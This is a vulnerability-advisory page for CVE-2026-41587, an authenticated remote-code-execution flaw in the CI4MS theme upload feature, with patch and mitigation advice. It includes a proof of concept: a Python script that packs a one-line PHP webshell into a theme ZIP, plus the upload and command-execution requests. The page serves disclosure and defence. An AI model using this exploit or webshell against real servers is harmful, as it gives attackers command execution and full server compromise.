Skip to main content

CI4MS CVE-2026-41587

| EUVDEUVD-2026-28260 HIGH
Unrestricted Upload of File with Dangerous Type (CWE-434)
2026-04-29 https://github.com/ci4-cms-erp/ci4ms GHSA-fw49-9xq4-gmx6
8.6
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.6 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

8
Analysis Updated
May 07, 2026 - 04:46 vuln.today
v2 (cvss_changed)
Re-analysis Queued
May 07, 2026 - 04:35 vuln.today
cvss_changed
CVSS changed
May 07, 2026 - 04:35 NVD
8.6 (HIGH)
Source Code Evidence Fetched
Apr 29, 2026 - 20:58 vuln.today
Analysis Generated
Apr 29, 2026 - 20:58 vuln.today
Analysis Generated
Apr 29, 2026 - 20:45 vuln.today
Patch released
Apr 29, 2026 - 20:45 nvd
Patch available
CVE Published
Apr 29, 2026 - 20:42 nvd
HIGH

DescriptionGitHub Advisory

Summary

A theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP.

Details

File: modules/Theme/Controllers/Theme.php

After a ZIP is uploaded and extracted to a temporary directory, install_theme_from_tmp() is called unconditionally: Theme.php:51-52

File: modules/Theme/Helpers/themes_helper.php

The helper copies every file matching *.* from public/templates/<name>/ inside the ZIP directly into public/templates/<name>/ on disk using rename(), with no file-extension allowlist, no MIME check, and no content inspection: themes_helper.php:60-68

Because the web root is public/, any .php file placed there is directly reachable over HTTP.

PHP files are also installed - without filtering - into app/Controllers/templates/<name>/, app/Libraries/templates/<name>/, and other app/ subdirectories: themes_helper.php:31-42

The theme name is derived from the uploaded filename via str_replace('_theme.zip', '', $file->getName()), so uploading evil_theme.zip sets the theme name to evil and the install target to public/templates/evil/: Theme.php:20

PoC

Prerequisites: A backend account with theme upload permission (e.g., backend/themes/upload).

Step 1 - Build the malicious ZIP:

import zipfile, io

buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
    z.writestr('public/templates/evil/shell.php', '<?php system($_GET["c"]); ?>')
buf.seek(0)
with open('evil_theme.zip', 'wb') as f:
    f.write(buf.read())

Step 2 - Upload:

POST /backend/themes/upload
Content-Type: multipart/form-data

field name: theme
file:       evil_theme.zip

Step 3 - Execute:

GET https://target.com/templates/evil/shell.php?c=id

Expected response: output of id (e.g., uid=33(www-data) gid=33(www-data) groups=33(www-data)).

Impact

Type: Authenticated Remote Code Execution (RCE) via arbitrary file write to the web root.

Who is impacted: Any deployment where a backend user has been granted theme upload permission. A superadmin already has full access, but any lower-privileged role granted this permission can use it to write and execute arbitrary PHP on the server, gaining OS-level command execution under the web server process. This can be used for data exfiltration, lateral movement, persistence, or full server compromise.

AnalysisAI

Authenticated users with theme upload permission in CI4MS (CodeIgniter 4 CMS/ERP) versions 0.26.0.0 through 0.31.6.0 can achieve remote code execution by uploading a malicious ZIP archive containing PHP files. The theme installation routine writes arbitrary files-including executable PHP-directly into the web-accessible public/templates/ directory without extension filtering or content validation, enabling direct HTTP access to webshells. A proof-of-concept exploit is publicly available via the GitHub security advisory (GHSA-fw49-9xq4-gmx6), and the vendor has released a patched version 0.31.7.0 implementing strict file extension allowlists for the public directory.

Technical ContextAI

CI4MS is a CodeIgniter 4-based content management and ERP framework (composer package ci4-cms-erp/ci4ms). The vulnerability stems from CWE-434 (Unrestricted Upload of File with Dangerous Type) in the theme upload feature implemented in modules/Theme/Controllers/Theme.php and modules/Theme/Helpers/themes_helper.php. When a user uploads a ZIP file via POST /backend/themes/upload, the application extracts it to a temporary directory and calls install_theme_from_tmp(), which uses PHP rename() to copy all files matching *.* from the archive into public/templates/<theme_name>/ on disk. Because public/ is the web root in CodeIgniter 4 deployments, any .php file written there becomes directly executable over HTTP. The flaw occurs at two critical points: (1) no MIME type or file extension validation before extraction (Theme.php:51-52), and (2) no allowlist enforcement during recursive file moves (themes_helper.php:60-68). The theme name is derived from the ZIP filename using str_replace('_theme.zip', ''), so evil_theme.zip installs to public/templates/evil/. PHP files are also written to app/Controllers/templates/, app/Libraries/templates/, and other subdirectories, expanding the attack surface. The vulnerability exists in the default theme installation workflow and requires no special server configuration beyond standard PHP/CodeIgniter setup.

RemediationAI

Upgrade immediately to CI4MS version 0.31.7.0 or later, which implements comprehensive file upload filtering. The patch (commit b969465e71eacd9eb57014ad1fce1fc34fa7bca0 at https://github.com/ci4-cms-erp/ci4ms/commit/b969465e71eacd9eb57014ad1fce1fc34fa7bca0) adds three layers of defense: pre-extraction ZIP validation to reject archives containing PHP files destined for public/, a strict extension allowlist (css, js, images, fonts, media, pdf, xml, json, txt, md) enforced during file installation, and path traversal detection to block ../ sequences. If immediate patching is not feasible, implement these compensating controls: (1) Revoke theme upload permission from all non-superadmin roles via the CI4MS backend permission system, recognizing this breaks legitimate theme installation workflows for lower-privileged users. (2) Deploy a web application firewall rule to block POST requests to /backend/themes/upload from non-superadmin sessions, though this requires session inspection capability. (3) Configure the web server (Apache/Nginx) to deny execution of .php files under public/templates/ by adding a location block (Nginx: location ~* ^/templates/.*\.php$ { deny all; }) or directory directive (Apache: <Directory /path/to/public/templates> php_flag engine off </Directory>), noting this may break legitimate themes that incorrectly place executable PHP in public/-audit existing themes first. (4) Monitor file creation events in public/templates/ and app/Controllers/templates/ using inotify or auditd, alerting on any .php writes. These mitigations carry operational overhead and do not address the root cause; upgrading to 0.31.7.0 is the only complete fix. Vendor advisory: https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fw49-9xq4-gmx6.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-41587 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy